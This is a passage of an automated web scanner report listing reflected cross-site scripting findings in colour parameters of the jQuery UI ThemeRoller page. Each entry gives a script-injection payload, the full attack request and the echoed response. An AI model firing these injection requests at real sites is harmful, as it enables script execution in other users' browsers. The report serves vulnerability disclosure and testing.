The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc42"><script>alert(1)</script>7b6e381a9c0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F88fc42"><script>alert(1)</script>7b6e381a9c0&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHi
...[SNIP]...

3.13. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc45"><script>alert(1)</script>f43f5c2ec6a was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF5dc45"><script>alert(1)</script>f43f5c2ec6a&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault
...[SNIP]...

3.14. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce41"><script>alert(1)</script>392cbdd1c3d was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF9ce41"><script>alert(1)</script>392cbdd1c3d&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

3.15. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911ae"><script>alert(1)</script>e29864d36d2 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF911ae"><script>alert(1)</script>e29864d36d2&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35
...[SNIP]...

3.16. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4c61"><script>alert(1)</script>5c7875cd310 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDDc4c61"><script>alert(1)</script>5c7875cd310&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&b
...[SNIP]...

3.17. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 473b0"><script>alert(1)</script>d66d5d90bc9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C473b0"><script>alert(1)</script>d66d5d90bc9&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityEr
...[SNIP]...

3.18. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e76d"><script>alert(1)</script>50ee2f3037a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF3e76d"><script>alert(1)</script>50ee2f3037a&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&bor
...[SNIP]...

3.19. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f2b5"><script>alert(1)</script>576b6389ccd was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&
...[SNIP]...

3.20. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ded7"><script>alert(1)</script>e2d451684 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120316

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
